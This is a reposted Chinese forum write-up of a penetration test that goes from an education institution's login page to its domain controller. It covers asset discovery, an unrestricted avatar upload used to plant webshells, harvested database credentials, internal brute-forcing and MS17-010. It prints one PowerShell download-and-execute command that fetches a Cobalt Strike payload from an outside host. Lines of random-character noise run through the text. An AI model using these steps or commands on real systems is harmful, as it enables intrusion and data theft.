|
" Z" M( i$ I$ D5 K( _% ^# ] 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
1 N& G% V M. K* B0 P : Q) j( J, @8 X! R/ Y3 z) d' A
2 ^% x+ m5 I9 x9 R0 H' x; t) N
5 e; K* a6 }2 Z2 F 9 b% b( D4 h, c3 m$ A
/ D# j0 F3 @( q
正文
. h2 ~9 V3 I3 E' {# B
: N% u3 p, ~' z
# O1 _- c0 M/ ^ c1 z0 l0 i0 ~* l7 { y
( {' A; v @1 N$ R; u* y
) O E" ~% q$ q0 z1 N9 j 目标:www.xxxx.com(一家教育机构)
6 b6 }; ~; l# J. c' P" l/ r打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
* n- j' G; S! ?/ t% ~, n9 W , a A) D$ M, S( l
5 e. k+ a5 M1 A
! i" O6 l6 m2 B" ^ ; `+ w5 G8 S& [) l e
" Z( m' U) Y/ X# S9 d0 Q 进行了简单的信息搜集
+ }# x! n8 r8 |, s, k& g
" w5 j1 |% M9 M9 \! W2 u! Z0 F
' t* q5 a, {' Y4 _6 ~1 c2 I1 W8 j ) a& b( Q1 w* c5 E
& [6 K9 o; j% }7 o2 y4 C* m' y- V
子域名搜集
2 \) F" A, k8 F4 H& y. S ( i, l0 D5 D# D, s
/ C$ o. k! r1 V) q+ D3 ], Q 
$ d. I& I- e7 K: \
; q# r: {5 v0 q! B; j1 w8 D
' X- f8 U& K+ O' i$ \! o fofa找资产
0 B, j5 M2 _+ }' q
- A1 @# n( \! O4 K* d+ ^% n) \* @. ^& m% Q4 G2 H/ F6 X, @
9 D1 s5 X; m2 E9 O, ~( C; w% O
0 j( H% L% P7 U% |7 x @
! e' ?% f, _; ?8 ?1 C/ x: Z% ~* H+ E
3 l9 ^$ p+ @% W5 X! A, Q& `7 l2 i2 @! s7 O- m- ]* l& _
一共七个资产。去重之后只有两个。
" ^1 r* q! E; b3 A6 ], s( J2 d
5 z8 {( }/ r! b5 ]7 a
1 }; V1 b) ~! `8 ~
3 G" n! C' W0 L e O7 O9 v0 e; u& E9 C8 D8 `! h: o
目录探测
% V3 x/ \. D& n
# Y" ^! u' ?4 l+ m
y4 a6 a1 E. Q2 z. B: |7 j; \. p  ! X* F9 u4 g+ c" ]
M8 Y# s8 g9 h- j0 \
' G @- K) f L( t3 |( ~ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
/ f" N3 G: L7 C6 j' A" U% x+ @) S2 o
' f M1 m* E" v2 V. X1 R$ {5 {5 M5 i1 H
) g, M1 L- o z, w `+ y
+ ~( ^5 J# m$ N1 C7 D0 j
我又尝试了通过修改返回包来绕过登录界面/ X( `* D. v9 e- M3 o
8 q s* I6 x2 N6 r# R
' f% V' i1 A/ {, t) l
3 c$ O) V; r1 [, z/ W( q$ T4 J }- u$ L% x- i7 [+ C3 U" l2 T
+ w4 `$ u% J! d) Q" \3 T5 k% k
还是不行,尝试注入无果
1 u% \. M+ y; C: R; N0 I 1 j" e1 j1 n, ^! d3 {- b/ f
& b J/ e8 C% l7 q2 s2 t/ C  , E/ \' ~, A9 {! Y+ m! [
$ \- V. I( p4 g' Y/ \
5 F1 ?0 J5 ^+ ^ 不过我目录探测出了一处Spring信息泄露
- T& T9 v0 ^" Y# f2 f+ e O' i+ P, Y
$ B4 b3 p( m& u5 a4 V, y
- {, m3 B5 M, H9 A7 i0 b( f9 e
& y! D0 C& x( h$ w, J1 p- e$ j0 g+ X- b! t; ?8 E- U3 f9 r
 $ y7 z+ E+ @0 ~9 c g" n" e
$ W0 ?* b& Z. w7 v6 b/ m! ]- e
$ o; A$ X6 D* L3 x3 i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
/ n- n b# n( O2 V R8 t& G; Z) S$ `! x
, w9 v: \5 ?5 r8 ~$ k( I2 f 
7 k w1 Q5 l+ d
" D5 s$ J2 s L% f: s) A; L# p1 u1 \; T7 {/ I I. J
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。% { A- ?3 }/ w/ ^2 [4 c. V
& r9 @& f9 W2 `3 C- F/ }5 Q5 j
7 K: S$ J0 _; ]; e6 n0 F6 V( h/ @- `2 A 
8 X. ? \; W ?
. P9 ]7 F; A/ H& T
6 r# ~0 L$ J# r7 M' P 获取有些师傅到这一步就手机抓包电脑测了。# F0 h; ~6 }+ J' @: Q0 U, e( W: c u! ~
+ ]. B0 g- M' G$ l5 R) C0 W$ j* X1 K: d, O
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
1 z: x4 r0 ~6 ?9 Q. T- T ( d+ d0 a+ ~6 r9 c2 Y( F' f3 J+ R
# | k0 \ ]7 ~4 |$ V; @5 ~/ k) C" _& \
其中在一个公众号发现了小程序,可以进行注册。
9 E2 V8 U& U1 M* M" J0 c0 l 8 B" [& A1 w, ?6 V1 P
$ c$ t/ i+ T. I+ c 看到了头像上传,尝试上传获取WebShell# C9 ?' X# a1 |$ R$ x
9 y3 K& @" Q2 D& `
* w i" u: y' K8 k( n& A% r3 |
 % }3 V+ s% d1 P) X$ B1 }: x/ R
# P0 c6 Y' x0 X0 ~8 v3 G, B% w2 @' y9 l+ n( S, p6 M- ^% u# _
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
" Z+ Z9 g. s0 P! j. t
' [$ l7 D; I% a$ T8 B4 Z- y! T# n2 R& K$ A1 v% y( }, j- }
 / ]6 O2 Y$ f) v; m) P' k
4 k: V' F8 [ `7 s& u
1 l( V: O' L& {( O/ Q2 K) b# e 然后上了大马7 n3 q* x+ a" h1 a" k# V
/ d" G( {/ h! h! x5 k
1 J% K% t5 A$ M$ ^ U( |$ U 
5 M, a+ D, f. r P4 s1 r" F
2 G; N {. @$ l: ^4 ^5 X
8 H" m2 s P- T: u6 {6 x. b 
& [6 C; S% W V& t
% l9 ]; u9 u! J$ Z3 B- }# n. u
* J. i; h' F7 K/ t 通过翻找文件发现数据库账号密码& q! v, z% W' m- H, s0 m
" r) B- S3 C! z( b# X; C
* I1 Z# a; q$ F/ D* y8 ^6 k# q
 2 O! o9 o+ b1 \; w X! Z
# v2 U+ L4 F: W. N* N- h) G/ | H( {& G6 I& Z& t& L: V6 i
--内网渗透7 Q+ Q" X& N9 J
' ~7 B7 Q0 f4 C; Q* p5 V2 b% E9 s" P
直接通过powershell执行 cs上线+ k# {( ?$ J" p9 B
9 G6 z7 s$ b0 x% z0 A1 D
3 Q1 g, t$ Y4 }1 @, r( Z6 M4 |
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
& q i6 T9 U) b, y2 k- U$ y/ b
! k* e- @% t( r; w% e. l- {. f$ u" p; k9 e* x
% F9 C& l) M1 z I , J5 ~& ]: O7 C
, ]! b2 q. H# t/ v9 u% i7 p; b 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) K) t$ Y1 ]3 Y' J
3 n ?' F1 K3 c1 |1 }6 z, n7 M/ `: B' v+ N
 3 n2 L: e4 v9 v- k
, y9 y, _ I) W) o2 f2 }
% g) |( x7 K5 n; _" z) c2 T9 b
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& }' b9 d3 V1 M$ c' e
2 {8 O" X2 q4 C
" V z. g! c2 b% j1 Q: U& U3 @
; X1 n% P! X Z( `% }6 Y
+ L& o+ P. m0 ^- @
% B7 z q3 `; f5 @* c# Q( L 
: ^' N" N+ G6 l" Z& {! a& R 4 X2 I5 l8 f! m& @/ W7 y
1 p1 k( o, I, S5 q! z2 l/ Z. R6 H 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! k+ p2 ^1 ^, }1 {& ?
1 Y, E; i x5 [' C: }9 }
2 P. \$ S, k3 [# [" O) q ; i; L1 A/ u3 p& ?* t0 G4 p' G
+ [; q! I: d, F) b  e, t4 R) o) T% W) u5 f# b$ E
2 Y' E3 N' s& N" M
7 T7 c$ G7 j* \& C( g5 ]
% Q0 q( Q" H) w* l) D3 |) u
3 V7 L7 J0 [6 a5 e: T9 n3 S7 ~! Y5 x @5 g6 D- J- r5 V6 I' X" l1 Q
6 ]- k) u* b* \) K
- d, ?3 G, A. R* r' t
7 i0 G$ y; @. |7 Q4 `/ A( A / \: k6 ^' V l
9 u* n) f9 g% o7 ^7 }3 b: w
小结* _* d$ `4 b- o& O
5 x3 L/ ]! k4 j+ W% z( K
& H1 c6 I$ x. J" m9 s, `
6 @( f# D3 x+ T4 g0 n8 J: K/ ^7 n# L
3 V, c" f& o3 C' n& \2 A1 G6 I( _3 P$ \
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
; k4 |/ ?4 c3 b7 w$ M , ]& d0 n5 h2 O# Q9 u5 k
4 o8 p5 E( q: w* |- V: H, F! T - X: V3 h2 V! f) `8 O
8 T" k" {4 H: {# v) |! l% N; z4 d/ f& t
, l. B3 d* |3 _4 \7 ]
- - G3 ?0 E6 }! ~! A
% a$ X6 o+ A+ r8 S; U
" @/ j- [' W: H1 V( t9 \; O# { -
- i. i" q1 \- l& R
9 ~/ Z" [' v5 ^; K" @, [! ]2 I
" ^7 ]4 |/ b/ ~' f) j9 a2 p
4 e [# {( k2 V% H+ ?$ \+ x5 v" b; V" D+ l- }7 F8 B
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
; E3 x, v7 T. B! d1 I
~, Y! p6 Z0 ^, p& ]4 E( ~
! u2 P" d: C! ~9 U: `
- Z! X% _. z- l7 h- S& z' n' t | 
发表于 2024-3-1 19:41:32
收藏
支持
反对